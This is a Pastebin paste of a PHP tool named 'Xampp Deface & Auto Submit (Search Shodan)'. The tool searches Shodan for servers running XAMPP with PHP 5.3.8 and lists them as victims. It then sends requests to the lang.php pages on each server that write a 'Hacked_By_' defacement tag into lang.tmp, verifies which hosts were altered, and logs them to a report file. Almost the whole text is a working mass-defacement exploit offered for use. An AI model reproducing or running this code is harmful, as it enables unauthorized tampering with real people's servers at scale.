API tools faq
paste
Advertisement
shor7cut

-_-

shor7cut
Jul 21st, 2015
833
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.60 KB | None | 0 0
raw download clone embed print report
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <title></title>
  5. <link rel="stylesheet" type="text/css" href="https://bootswatch.com/cyborg/bootstrap.css"/>
  6. <link rel="stylesheet" type="text/css" href="https://bootswatch.com/cyborg/bootstrap.min.css"/>
  7. </head>
  8. <body>
  9. <div class="container">
  10.  
  11. <?php
  12. /*
  13. Name : Xampp Deface & Auto Submit (Search Shodan)
  14. Author : Shor7cut
  15. Hai , Kiddies ?
  16. */
  17. error_reporting(0);
  18. set_time_limit(0);
  19. ini_set('memory_limit', '64M');
  20. if($_GET['scan']==""){?>
  21. <div class="row">
  22. <ul class="breadcrumb">
  23. <li><a href="?cmd=scan">Scan</a></li>
  24. <li><a href="?cmd=victim">Cari victim</a></li>
  25. </ul>
  26. </div>
  27.  
  28. <?php
  29. }
  30. if($_GET['cmd']=="scan"){?>
  31. <form class="form-horizontal" action="<?php echo basename($_SERVER["SCRIPT_FILENAME"]);?>" method="post">
  32. <div class="form-group">
  33. <label class="col-lg-2 control-label">Notice </label>
  34. <div class="col-lg-5">
  35. <input type="text" class="form-control" name="hacker" value="Shor7cut" placeholder="Shor7cut">
  36. </div>
  37. </div>
  38.  
  39.  
  40. <div class="form-group">
  41. <label for="textArea" class="col-lg-2 control-label">Textarea</label>
  42. <div class="col-lg-10">
  43. <textarea class="form-control" rows="3" name="sites" id="textArea"></textarea>
  44. <span class="help-block">A longer block of help text that breaks onto a new line and may extend beyond one line.</span>
  45. </div>
  46. </div>
  47.  
  48. <div class="form-group">
  49. <label class="col-lg-2 control-label">Pemisah</label>
  50. <div class="col-lg-1">
  51. <input type="text" class="form-control" name="pemisah" value="|" placeholder="|">
  52. </div>
  53. <input type="submit" class="btn btn-primary" name="scan" value="scan">
  54. </div>
  55.  
  56.  
  57.  
  58. </form>
  59.  
  60. <?php
  61. }
  62. if($_GET['cmd']=="victim"){
  63. $get = file_get_contents("https://api.shodan.io/shodan/host/search?key=1111111111111111111111111111&query=xampp+PHP/5.3.8");
  64. $json = json_decode($get,true);
  65. echo count($json['matches'])."<br>";
  66. echo '<textarea class="form-control" rows="3" name="sites" id="textArea">';
  67. foreach ($json['matches'] as $key => $value) {
  68. echo $value['ip_str']."|";
  69. }
  70. echo '</textarea>';
  71. }
  72.  
  73.  
  74. if($_POST['scan']){
  75. $sit = $_POST['sites'];
  76. $pemisah = $_POST['pemisah'];
  77. $hacker = $_POST['hacker'];
  78. $site = explode($pemisah, $sit);
  79. ?>
  80. <div class="panel panel-primary">
  81. <div class="panel-heading">
  82. <h3 class="panel-title">Scan Target</h3>
  83. </div>
  84. <div class="panel-body">
  85.  
  86. <?php
  87. foreach ($site as $key => $sites) {
  88. $url1 = "$sites/xampp/lang.php?Hacked_By_$hacker";
  89. $url2 = "$sites/security/lang.php?Hacked_By_$hacker";
  90. $patch_result1 = "$sites/xampp/lang.tmp?";
  91. $patch_result2 = "$sites/security/lang.tmp?";
  92.  
  93. // xampp - patch lang.php\\
  94. $xamppcurl = curl_init("$url1");
  95. curl_setopt($xamppcurl, CURLOPT_FAILONERROR, true);
  96. curl_setopt($xamppcurl, CURLOPT_FOLLOWLOCATION, true);
  97. curl_setopt($xamppcurl, CURLOPT_RETURNTRANSFER, true);
  98. curl_setopt($xamppcurl, CURLOPT_CONNECTTIMEOUT ,0);
  99. curl_setopt($xamppcurl, CURLOPT_TIMEOUT, 30);
  100. $result = curl_exec($xamppcurl);
  101.  
  102. $xamppcur2 = curl_init("$url2");
  103. curl_setopt($xamppcur2, CURLOPT_FAILONERROR, true);
  104. curl_setopt($xamppcur2, CURLOPT_FOLLOWLOCATION, true);
  105. curl_setopt($xamppcur2, CURLOPT_RETURNTRANSFER, true);
  106. curl_setopt($xamppcur2, CURLOPT_CONNECTTIMEOUT ,0);
  107. curl_setopt($xamppcur2, CURLOPT_TIMEOUT, 30);
  108. $result = curl_exec($xamppcur2);
  109.  
  110.  
  111.  
  112. // xampp - patch \\
  113. $xampp_tmp = curl_init("$patch_result1");
  114. curl_setopt($xampp_tmp, CURLOPT_FAILONERROR, true);
  115. curl_setopt($xampp_tmp, CURLOPT_FOLLOWLOCATION, true);
  116. curl_setopt($xampp_tmp, CURLOPT_RETURNTRANSFER, true);
  117. curl_setopt($xampp_tmp, CURLOPT_CONNECTTIMEOUT ,0);
  118. curl_setopt($xampp_tmp, CURLOPT_TIMEOUT, 30);
  119. $resultxampp_tmp = curl_exec($xampp_tmp);
  120.  
  121. $xampp_tmp2 = curl_init("$patch_result2");
  122. curl_setopt($xampp_tmp2, CURLOPT_FAILONERROR, true);
  123. curl_setopt($xampp_tmp2, CURLOPT_FOLLOWLOCATION, true);
  124. curl_setopt($xampp_tmp2, CURLOPT_RETURNTRANSFER, true);
  125. curl_setopt($xampp_tmp2, CURLOPT_CONNECTTIMEOUT ,0);
  126. curl_setopt($xampp_tmp2, CURLOPT_TIMEOUT, 30);
  127. $resultxampp_tmp2 = curl_exec($xampp_tmp2);
  128.  
  129.  
  130. ?>
  131.  
  132. <?php
  133. if(eregi("Hacked_By_",$resultxampp_tmp))
  134. {
  135. echo $patch_result1."<br>";
  136. $berkas =fopen("laporan.txt","a");
  137. fputs($berkas, $patch_result1."\r\n");
  138. fclose($berkas);
  139. }else if(eregi("Hacked_By_",$resultxampp_tmp2))
  140. {
  141. echo $patch_result2."<br>";
  142. $berkas =fopen("laporan.txt","a");
  143. fputs($berkas, $patch_result2."\r\n");
  144. fclose($berkas);
  145.  
  146. }else {
  147. echo $sites." -> not vuln"."<br>";
  148. }
  149.  
  150. flush();
  151. ob_flush();
  152. sleep(2);
  153. }
  154. }
  155. ?>
  156.  
  157. </div>
  158. </div>
  159. </div>
  160. </body>
  161. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!